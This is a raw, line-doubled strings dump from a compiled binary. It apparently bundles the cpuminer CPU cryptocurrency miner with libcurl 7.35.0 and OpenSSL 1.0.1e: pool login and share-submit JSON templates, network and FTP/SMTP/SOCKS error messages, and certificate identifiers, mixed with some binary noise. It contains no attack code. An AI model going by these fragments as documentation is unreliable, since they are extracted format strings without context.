JSON key '%s' is not a string
Auth id: %s
Auth id: %s
JSON returned status "%s"
JSON returned status "%s"
{"method": "login", "params": {"login": "%s", "pass": "%s", "agent": "cpuminer-multi/0.1"}, "id": 1}
{"method": "login", "params": {"login": "%s", "pass": "%s", "agent": "cpuminer-multi/0.1"}, "id": 1}
DEBUG: authenticated in %d ms
DEBUG: authenticated in %d ms
json_rpc2.0 error: %s
json_rpc2.0 error: %s
CURL initialization failed
CURL initialization failed
%s%s%s
%s%s%s
Long-polling activated for %s
Long-polling activated for %s
{"method": "submit", "params": {"id": "%s", "job_id": "%s", "nonce": "%s", "result": "%s"}, "id":1}
{"method": "submit", "params": {"id": "%s", "job_id": "%s", "nonce": "%s", "result": "%s"}, "id":1}
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
{"method": "getwork", "params": [ "%s" ], "id":1}
getwork failed, retry after %d seconds
getwork failed, retry after %d seconds
DEBUG: got new work in %d ms
DEBUG: got new work in %d ms
%s: unsupported non-option argument '%s'
%s: unsupported non-option argument '%s'
JSON option %s invalid
JSON option %s invalid
%s: no URL supplied
%s: no URL supplied
%s:%s
%s:%s
https:
https:
thread %d create failed
thread %d create failed
%d miner threads started, using '%s' algorithm.
%d miner threads started, using '%s' algorithm.
cert
cert
userpass
userpass
[%d-d-d d:d:d] %s
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.3
User-Agent: cpuminer/2.3.3
HTTP request failed: %s
HTTP request failed: %s
JSON-RPC call failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
hex2bin failed on '%s'
DEBUG: %s
DEBUG: %s
Hash: %s
Hash: %s
Target: %s
Target: %s
http%s
http%s
Stratum connection failed: %s
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3"]}
mining.notify
mining.notify
Stratum session id: %s
Stratum session id: %s
mining.set_difficulty
mining.set_difficulty
client.reconnect
client.reconnect
stratum tcp://%s:%d
stratum tcp://%s:%d
Ignoring request to reconnect to %s
Ignoring request to reconnect to %s
Server requested reconnection to %s
Server requested reconnection to %s
client.get_version
client.get_version
cpuminer/2.3.3
cpuminer/2.3.3
client.show_message
client.show_message
MESSAGE FROM SERVER: %s
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
tXXFr.rh.44Aw-wl-66
tXXFr.rh.44Aw-wl-66
r.rh.44Fw-wl-66A
r.rh.44Fw-wl-66A
.rh.44Fr-wl-66Aw
.rh.44Fr-wl-66Aw
O9K\9..eKW
O9K\9..eKW
trh.44Fr.wl-66Aw-
trh.44Fr.wl-66Aw-
K\9..eK9
K\9..eK9
h.44Fr.rl-66Aw-w
h.44Fr.rl-66Aw-w
O\9..eK9K=W
O\9..eK9K=W
.44Fr.rh-66Aw-wl
.44Fr.rh-66Aw-wl
9..eK9K\W
9..eK9K\W
t44Fr.rh.66Aw-wl-
t44Fr.rh.66Aw-wl-
..eK9K\9
..eK9K\9
tX4Fr.rh.46Aw-wl-6
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
.eK9K\9.
:x
:x
:,7.35.0
:,7.35.0
smtp
smtp
tftp
tftp
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Trying %s...
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Local port: %hu
Local port: %hu
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
bind failed with errno %d: %s
Immediate connect fail for %s: %s
Immediate connect fail for %s: %s
Couldn't bind to '%s'
Couldn't bind to '%s'
connect to %s port %ld failed: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Failed to connect to %s port %ld: %s
[%s %s %s]
[%s %s %s]
Send failure: %s
Send failure: %s
Recv failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
Write callback asked for PAUSE when not supported!
%s:%d
%s:%d
Hostname was %sfound in DNS cache
Hostname was %sfound in DNS cache
timeout on name lookup is not supported
timeout on name lookup is not supported
%5[^:]:%d:%5s
%5[^:]:%d:%5s
Resolve %s found illegal!
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
Added %s:%d:%s to DNS cache
IDN support not present, can't parse Unicode domains
IDN support not present, can't parse Unicode domains
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
User-Agent: %s
[^:]:%[^
[^:]:%[^
:]://%[^
:]://%[^
<url> malformed</url>
<url> malformed</url>
SMTP.
SMTP.
Rebuilt URL to: %s
Rebuilt URL to: %s
Protocol %s not supported or disabled in libcurl
Protocol %s not supported or disabled in libcurl
%s://%s
%s://%s
http_proxy
http_proxy
[%*45[0123456789abcdefABCDEF:.]%c
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
;type=%c
%s://%s%s%s:%hu%s%s%s
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
Couldn't find host %s in the _netrc file; using defaults
ftp@example.com
ftp@example.com
Found bundle for host %s: %p
Found bundle for host %s: %p
Server doesn't support pipelining
Server doesn't support pipelining
Found connection %ld, with requests in the pipe (%zu)
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with host %s
Re-using existing connection! (#%ld) with host %s
Couldn't resolve host '%s'
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
Connection #%ld to host %s left intact
Curl_poll(%d ds, %d ms)
Curl_poll(%d ds, %d ms)
Internal error clearing splay node = %d
Internal error clearing splay node = %d
Internal error removing splay node = %d
Internal error removing splay node = %d
Pipe broke: handle 0x%p, url = %s
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
#HttpOnly_
#HttpOnly_
23[^;
23[^;
=]=I99[^;
=]=I99[^;
httponly
httponly
skipped cookie with bad tailmatch domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %I64d
%s cookie %s="%s" for domain %s, path %s, expire %I64d
# Netscape HTTP Cookie File
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
# Fatal libcurl error
WARNING: failed to save cookies in %s
WARNING: failed to save cookies in %s
%d.%d.%d.%d
%d.%d.%d.%d
CURLSHcode unknown
CURLSHcode unknown
Protocol option is unsupported
Protocol option is unsupported
Protocol is unsupported
Protocol is unsupported
Socket is unsupported
Socket is unsupported
Operation not supported
Operation not supported
Address family not supported
Address family not supported
Protocol family not supported
Protocol family not supported
Winsock version not supported
Winsock version not supported
Unknown error %d (%#x)
Unknown error %d (%#x)
Please call curl_multi_perform() soon
Please call curl_multi_perform() soon
Unsupported protocol
Unsupported protocol
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: The server failed to connect to data port
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: Accepting server connect has timed out
FTP: Accepting server connect has timed out
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
HTTP response code said error
FTP: command PORT failed
FTP: command PORT failed
FTP: command REST failed
FTP: command REST failed
Operation was aborted by an application callback
Operation was aborted by an application callback
A libcurl function was given a bad argument
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Peer certificate cannot be authenticated with given CA certificates
Unrecognized or bad HTTP Content or Transfer-Encoding
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Invalid LDAP URL
Login denied
Login denied
TFTP: File Not Found
TFTP: File Not Found
TFTP: Access Violation
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: No such user
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Error in the SSH layer
Error in the SSH layer
Issuer check against peer certificate failed
Issuer check against peer certificate failed
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
Unable to parse FTP file list
Unable to parse FTP file list
0123456789
0123456789
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
Curl_ipv4_resolve_r failed for %s
Curl_ipv4_resolve_r failed for %s
%sAuthorization: Basic %s
%sAuthorization: Basic %s
HTTP/
HTTP/
Avoided giant realloc for header (max is %d)!
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
The requested URL returned error: %d
%s auth using %s with user '%s'
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Modified-Since: %s
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
Referer: %s
Referer: %s
Accept-Encoding: %s
Accept-Encoding: %s
Host: %s%s%s
Host: %s%s%s
Host: %s%s%s:%hu
Host: %s%s%s:%hu
ftp://
ftp://
Range: bytes=%s
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
Content-Range: bytes %s/%I64d
ftp://%s:%s@%s
ftp://%s:%s@%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
%s%s=%s
Internal HTTP POST error!
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP POST request
Failed sending HTTP request
Failed sending HTTP request
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
HTTP error before end of send, stop sending
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP/%d.%d =
HTTP =
HTTP =
RTSP/%d.%d =
RTSP/%d.%d =
The requested URL returned error: %s
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
HTTP/1.0 connection set to keep alive!
USER %s
USER %s
PBSZ %d
PBSZ %d
Failure sending QUIT command: %s
Failure sending QUIT command: %s
ftp server doesn't support SIZE
ftp server doesn't support SIZE
RETR %s
RETR %s
Connect data stream passively
Connect data stream passively
APPE %s
APPE %s
STOR %s
STOR %s
SIZE %s
SIZE %s
getsockname() failed: %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
failed to resolve the address provided to PORT: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
bind() failed, we ran out of ports!
socket failure: %s
socket failure: %s
%s |%d|%s|%hu|
%s |%d|%s|%hu|
Failure sending EPRT command: %s
Failure sending EPRT command: %s
,%d,%d
,%d,%d
%s %s
%s %s
Failure sending PORT command: %s
Failure sending PORT command: %s
Uploading to a URL without a file name!
Uploading to a URL without a file name!
FTPS not supported!
FTPS not supported!
PASS %s
PASS %s
ACCT %s
ACCT %s
Access denied: d
Access denied: d
%c%c%c%u%c
%c%c%c%u%c
Illegal port number in EPSV reply
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
Skips %d.%d.%d.%d for data connection, uses %s instead
Bad PASV/EPSV response: d
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Can't resolve new host %s:%hu
Connecting to %s (%s) port %d
Connecting to %s (%s) port %d
TYPE %c
TYPE %c
MDTM %s
MDTM %s
CWD %s
CWD %s
PRET %s
PRET %s
PRET STOR %s
PRET STOR %s
PRET RETR %s
PRET RETR %s
REST %d
REST %d
FTP response timeout
FTP response timeout
FTP response aborted due to select/poll error: %d
FTP response aborted due to select/poll error: %d
Preparing for accepting server on data port
Preparing for accepting server on data port
Got a d ftp-server response when 220 was expected
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
AUTH %s
AUTH %s
ACCT rejected by server: d
ACCT rejected by server: d
PROT %c
PROT %c
Entry path is '%s'
Entry path is '%s'
QUOT command failed with d
QUOT command failed with d
MKD %s
MKD %s
Failed to MKD dir: d
Failed to MKD dir: d
dddddd
dddddd
ddd d:d:d GMT
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
unsupported MDTM reply format
Got a d response code instead of the assumed 200
Got a d response code instead of the assumed 200
PRET command not accepted: d
PRET command not accepted: d
Failed to do PORT
Failed to do PORT
RETR response: d
RETR response: d
Failed FTP upload:
Failed FTP upload:
Wildcard - START of "%s"
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Wildcard - "%s" skipped by user
ftp_perform ends with SECONDARY: %d
ftp_perform ends with SECONDARY: %d
Remembering we are in dir "%s"
Remembering we are in dir "%s"
Failure sending ABOR command: %s
Failure sending ABOR command: %s
server did not report OK, got %d
server did not report OK, got %d
QUOT string not accepted: %s
QUOT string not accepted: %s
PORT
PORT
%s IAC %s
%s IAC %s
%s IAC %d
%s IAC %d
%s %s %s
%s %s %s
%s %s %d
%s %s %d
%s %d %d
%s %d %d
Sending data failed (%d)
Sending data failed (%d)
%s IAC SB
%s IAC SB
%s (unsupported)
%s (unsupported)
%d (unknown)
%d (unknown)
%c%c%c%c%s%c%c
%c%c%c%c%s%c%c
%c%c%c%c
%c%c%c%c
7[^,],7s
7[^,],7s
%c%s%c%s
%c%s%c%s
USER,%s
USER,%s
7[^= ]%*[ =]%5s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Syntax error in telnet option: %s
Unknown telnet option %s
Unknown telnet option %s
WSAStartup failed (%d)
WSAStartup failed (%d)
insufficient winsock version to support telnet
insufficient winsock version to support telnet
failed to load WS2_32.DLL (%d)
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
FreeLibrary(wsock2) failed (%d)
WS2_32.DLL
WS2_32.DLL
CLIENT libcurl 7.35.0
CLIENT libcurl 7.35.0
MATCH %s %s %s
MATCH %s %s %s
DEFINE %s %s
DEFINE %s %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: %s
LDAP local: Cannot connect to %s:%ld
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
LDAP remote: %s
There are more than %d entries
There are more than %d entries
LDAP local: trying to establish %s connection
LDAP local: trying to establish %s connection
Couldn't open file %s
Couldn't open file %s
Can't open %s for writing
Can't open %s for writing
Can't get the size of %s
Can't get the size of %s
Received last DATA packet block %d again.
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
tftp_rx: internal error
set timeouts for state %d; Total %ld, retry %d maxtry %d
set timeouts for state %d; Total %ld, retry %d maxtry %d
Received ACK for block %d, expecting %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
tftp_tx: internal error, event: %i
bind() failed; %s
bind() failed; %s
%s%c%s%c
%s%c%s%c
tftp_send_first: internal error
tftp_send_first: internal error
TFTP finished
TFTP finished
TFTP response timeout
TFTP response timeout
got option=(%s) value=(%s)
got option=(%s) value=(%s)
blksize is larger than max supported
blksize is larger than max supported
%s (%d)
%s (%d)
blksize is smaller than min supported
blksize is smaller than min supported
%s (%ld)
%s (%ld)
%s (%d) %s (%d)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
invalid tsize -:%s:- value in OACK packet
TFTP
TFTP
%cd
%cd
LIST "%s" *
LIST "%s" *
FETCH %s BODY[%s]
FETCH %s BODY[%s]
LOGIN
LOGIN
LOGIN %s %s
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
AUTHENTICATE %s
No known authentication mechanisms supported!
No known authentication mechanisms supported!
IMAPS not supported!
IMAPS not supported!
Access denied: %d
Access denied: %d
APPEND %s (\Seen) {%I64d}
APPEND %s (\Seen) {%I64d}
SELECT %s
SELECT %s
LOGINDISABLED
LOGINDISABLED
STARTTLS not supported.
STARTTLS not supported.
STARTTLS denied. %c
STARTTLS denied. %c
Access denied. %c
Access denied. %c
Authentication failed: %d
Authentication failed: %d
AUTH %s %s
AUTH %s %s
POP3S not supported!
POP3S not supported!
APOP %s %s
APOP %s %s
STLS not supported.
STLS not supported.
RCPT TO:%s
RCPT TO:%s
RCPT TO:<%s>
RCPT TO:<%s>
SMTPS not supported!
SMTPS not supported!
Got unexpected smtp-server response: %d
Got unexpected smtp-server response: %d
EHLO %s
EHLO %s
HELO %s
HELO %s
Remote access denied: %d
Remote access denied: %d
Command failed: %d
Command failed: %d
MAIL failed: %d
MAIL failed: %d
RCPT failed: %d
RCPT failed: %d
DATA failed: %d
DATA failed: %d
MAIL FROM:%s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
MAIL FROM:%s SIZE=%s
SMTP
SMTP
Refusing to issue an RTSP request [%s] without a session ID.
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport:
Transport: %s
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
Range: %s
%s %s RTSP/1.0
%s %s RTSP/1.0
Session: %s
Session: %s
%s%s%s%s%s%s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%%X
%%X
xxxx
xxxx
%s:%s:%s
%s:%s:%s
%s:%.*s
%s:%.*s
%s:%s:x:%s:%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"
%s, opaque="%s"
%s, opaque="%s"
%s, algorithm="%s"
%s, algorithm="%s"
SOCKS4 communication to %s:%d
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s:%hu
%s%s%s:%hu
%s%s%s:%hu
Host: %s
Host: %s
CONNECT %s HTTP/%s
CONNECT %s HTTP/%s
%s%s%s%s
%s%s%s%s
HTTP/1.%d %d
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
login
login
password
password
operation aborted by callback
operation aborted by callback
Read callback asked for PAUSE when not supported!
Read callback asked for PAUSE when not supported!
seek callback returned error %d
seek callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
ioctl callback returned error %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
Simulate a HTTP 304 response!
Problem (%d) in the Chunked-Encoded data
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
No URL set!
[^?&/:]://%c
[^?&/:]://%c
Issue another request to this URL: '%s'
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Disables POST, goes with %s
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Site %s:%d is pipeline blacklisted
Server %s is not blacklisted
Server %s is not blacklisted
Server %s is blacklisted
Server %s is blacklisted
d:d:d
d:d:d
d:d
d:d
%c%c==
%c%c==
%c%c%c=
%c%c%c=
------------------------xx
------------------------xx
; filename="%s"
; filename="%s"
%s; boundary=%s
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
Content-Type: %s
couldn't open file "%s"
couldn't open file "%s"
--%s--
--%s--
.jpeg
.jpeg
.html
.html
0123456789-
0123456789-
%s xxxxxxxxxxxxxxxx
%s xxxxxxxxxxxxxxxx
%s/%s
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
user=%s
user=%s
auth=Bearer %s
auth=Bearer %s
%s near '%s'
%s near '%s'
%s near end of file
%s near end of file
unable to decode byte 0x%x at position %d
unable to decode byte 0x%x at position %d
control character 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
end == saved_text lex->saved_text.length
unable to open %s: %s
unable to open %s: %s
\ux
\ux
\ux\ux
\ux\ux
Assertion failed: (%s), file %s, line %d
Assertion failed: (%s), file %s, line %d
M%p %d %s
M%p %d %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
once %p is %d
once %p is %d
T%p %d %s
T%p %d %s
T%p %d V=%0X H=%p %s
T%p %d V=%0X H=%p %s
C%p %d %s
C%p %d %s
C%p %d V=%0X B=%d b=%p w=%ld %s
C%p %d V=%0X B=%d b=%p w=%ld %s
RWL%p %d %s
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013
SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013
%s(%d): OpenSSL internal error, assertion failed: %s
%s(%d): OpenSSL internal error, assertion failed: %s
x509_pkey
x509_pkey
evp_pkey
evp_pkey
ssl_cert
ssl_cert
ssl_sess_cert
ssl_sess_cert
Stack part of OpenSSL 1.0.1e 11 Feb 2013
Stack part of OpenSSL 1.0.1e 11 Feb 2013
error:lX:%s:%s:%s
error:lX:%s:%s:%s
passed a null parameter
passed a null parameter
x509 certificate routines
x509 certificate routines
DSO support routines
DSO support routines
dhKeyAgreement
dhKeyAgreement
challengePassword
challengePassword
extendedCertificateAttributes
extendedCertificateAttributes
nsCertExt
nsCertExt
Netscape Certificate Extension
Netscape Certificate Extension
nsCertType
nsCertType
Netscape Cert Type
Netscape Cert Type
nsBaseUrl
nsBaseUrl
Netscape Base Url
Netscape Base Url
nsRevocationUrl
nsRevocationUrl
Netscape Revocation Url
Netscape Revocation Url
nsCaRevocationUrl
nsCaRevocationUrl
Netscape CA Revocation Url
Netscape CA Revocation Url
nsRenewalUrl
nsRenewalUrl
Netscape Renewal Url
Netscape Renewal Url
nsCaPolicyUrl
nsCaPolicyUrl
Netscape CA Policy Url
Netscape CA Policy Url
nsCertSequence
nsCertSequence
Netscape Certificate Sequence
Netscape Certificate Sequence
subjectKeyIdentifier
subjectKeyIdentifier
X509v3 Subject Key Identifier
X509v3 Subject Key Identifier
keyUsage
keyUsage
X509v3 Key Usage
